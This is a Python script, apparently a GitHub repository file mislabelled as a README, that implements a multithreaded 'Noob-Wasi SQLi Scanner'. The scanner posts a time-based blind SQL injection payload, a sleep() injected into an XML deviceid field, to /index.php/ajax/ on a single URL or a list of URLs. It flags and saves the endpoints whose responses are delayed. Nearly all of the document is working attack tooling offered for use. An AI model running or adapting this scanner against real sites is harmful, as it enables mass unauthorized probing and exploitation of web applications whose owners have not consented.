# README.md
# Rendering markdown...
import requests
import time
import argparse
from urllib.parse import urlparse
from colorama import init, Fore, Style
import concurrent.futures
import sys
# Initialize colorama so ANSI color escapes render correctly (incl. Windows).
init()
# Headers sent with every probe; the XML content type matches the payload body.
headers = {
"Content-Type": "application/xml",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
}
# Time-based blind SQLi payload: {} is filled with a sleep() duration.
# A vulnerable backend executes the injected sleep and delays its response.
payload_template = """<?xml version="1.0" encoding="UTF-8"?>
<xml>
<QUERY>get_params</QUERY>
<deviceid>', IF((1=1),(select sleep({})),1), 0, 0, 0, 0, 0, 0);#</deviceid>
<content>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</content>
</xml>"""
# Startup banner printed by main().
BANNER = f"""
{Fore.CYAN}╔════════════════════════════╗{Style.RESET_ALL}
{Fore.CYAN}║ {Fore.YELLOW}Noob-Wasi SQLi Scanner {Fore.CYAN}║{Style.RESET_ALL}
{Fore.CYAN}║ {Fore.GREEN}Coded by: Noob-Wasi {Fore.CYAN}║{Style.RESET_ALL}
{Fore.CYAN}║ {Fore.MAGENTA}Version: 1.0 {Fore.CYAN}║{Style.RESET_ALL}
{Fore.CYAN}╚════════════════════════════╝{Style.RESET_ALL}
"""
def is_valid_url(url):
    """Return True when *url* parses with both a scheme and a network location.

    e.g. "https://example.com" is valid; "example.com" (no scheme) is not.
    """
    try:
        parts = urlparse(url)
        return all([parts.scheme, parts.netloc])
    except ValueError:
        # Was a bare `except:` — catch only what urlparse actually raises
        # (e.g. malformed IPv6 literals) instead of swallowing everything.
        return False
def test_sql_injection(url, sleep_time=7):
    """Probe *url* for time-based blind SQL injection.

    Sends a baseline request (sleep 0) followed by a request asking the
    backend to sleep(sleep_time); if the second response is delayed by
    roughly sleep_time, the endpoint is considered vulnerable.

    Returns (url, delay_seconds) on a hit, otherwise (None, 0).
    """
    try:
        # The injectable handler lives at /index.php/ajax/; normalise the URL.
        if not url.endswith('/index.php/ajax/'):
            url = url.rstrip('/') + '/index.php/ajax/'

        def timed_post(delay, timeout):
            # POST the payload with the given sleep value; return elapsed seconds.
            began = time.time()
            requests.post(url, headers=headers,
                          data=payload_template.format(delay), timeout=timeout)
            return time.time() - began

        baseline = timed_post(0, 10)
        probe = timed_post(sleep_time, sleep_time + 5)

        difference = probe - baseline
        # Allow 20% slack for network jitter.
        if difference > sleep_time * 0.8:
            return url, difference
        return None, 0
    except requests.exceptions.Timeout:
        # The injected sleep() pushed the request past its timeout:
        # treat the target as vulnerable.
        return url, sleep_time
    except requests.exceptions.RequestException:
        return None, 0
def scan_urls(urls, max_threads=10):
    """Run test_sql_injection over *urls* using a thread pool.

    Prints a live progress line and reports each vulnerable target as soon
    as its result arrives. Returns a list of (url, delay) tuples.
    """
    hits = []
    total = len(urls)
    done = 0

    with concurrent.futures.ThreadPoolExecutor(max_workers=max_threads) as pool:
        # Only well-formed URLs are submitted; malformed ones are skipped.
        pending = {pool.submit(test_sql_injection, target): target
                   for target in urls if is_valid_url(target)}
        for fut in concurrent.futures.as_completed(pending):
            target, delay = fut.result()
            if target:
                hits.append((target, delay))
                # Report the hit immediately rather than waiting for the end.
                print(f"\n{Fore.GREEN}[VULN] {target} - Delay: {delay:.2f}s{Style.RESET_ALL}")
            done += 1
            sys.stdout.write(f"\r{Fore.CYAN}Scanning: {done}/{total} ({(done/total)*100:.1f}%) {Style.RESET_ALL}")
            sys.stdout.flush()
    print()  # move past the in-place progress line
    return hits
def scan_urls_from_file(filename, max_threads=10):
    """Load newline-separated URLs from *filename* and scan them.

    Blank lines are ignored. Returns the list of vulnerable (url, delay)
    tuples, or [] when the file cannot be read.
    """
    try:
        with open(filename, 'r') as file:
            urls = [line.strip() for line in file if line.strip()]
        return scan_urls(urls, max_threads)
    except FileNotFoundError:
        # BUG FIX: this message previously printed the literal text
        # "(unknown)" instead of interpolating the missing file's name.
        print(f"{Fore.RED}[-] Error: File {filename} not found{Style.RESET_ALL}")
        return []
    except Exception as e:
        print(f"{Fore.RED}[-] Error reading file: {str(e)}{Style.RESET_ALL}")
        return []
def scan_single_url(url):
    """Scan one URL; print and return [(url, delay)] if vulnerable, else []."""
    found, delay = test_sql_injection(url)
    if not found:
        return []
    print(f"{Fore.GREEN}[VULN] {found} - Delay: {delay:.2f}s{Style.RESET_ALL}")
    return [(found, delay)]
def save_results(vulnerable_urls, output_file):
    """Write each (url, delay) pair to *output_file*, one per line."""
    try:
        with open(output_file, 'w') as fh:
            for target, delay in vulnerable_urls:
                fh.write(f"{target} - Delay: {delay:.2f}s\n")
        print(f"{Fore.GREEN}[+] Results saved to {output_file}{Style.RESET_ALL}")
    except Exception as e:
        print(f"{Fore.RED}[-] Error saving results: {str(e)}{Style.RESET_ALL}")
def main():
    """Parse command-line arguments and drive the scan."""
    parser = argparse.ArgumentParser(description="Noob-Wasi SQL Injection Scanner")
    parser.add_argument('-u', '--url', help="Single URL to scan")
    parser.add_argument('-f', '--file', help="File containing list of URLs")
    parser.add_argument('-o', '--output', help="Output file to save vulnerable URLs")
    parser.add_argument('-t', '--threads', type=int, default=10,
                        help="Number of concurrent threads (default: 10)")
    args = parser.parse_args()

    print(BANNER)

    # At least one target source is required.
    if not args.url and not args.file:
        parser.print_help()
        return

    print(f"{Fore.CYAN}Starting SQL injection scan...{Style.RESET_ALL}")

    findings = []
    if args.url:
        if is_valid_url(args.url):
            findings = scan_single_url(args.url)
        else:
            print(f"{Fore.RED}[-] Invalid URL: {args.url}{Style.RESET_ALL}")
    elif args.file:
        findings = scan_urls_from_file(args.file, args.threads)

    print(f"{Fore.CYAN}\nScan completed!{Style.RESET_ALL}")
    if findings:
        if args.output:
            save_results(findings, args.output)
    else:
        print(f"{Fore.RED}\nNo vulnerabilities detected.{Style.RESET_ALL}")


if __name__ == "__main__":
    main()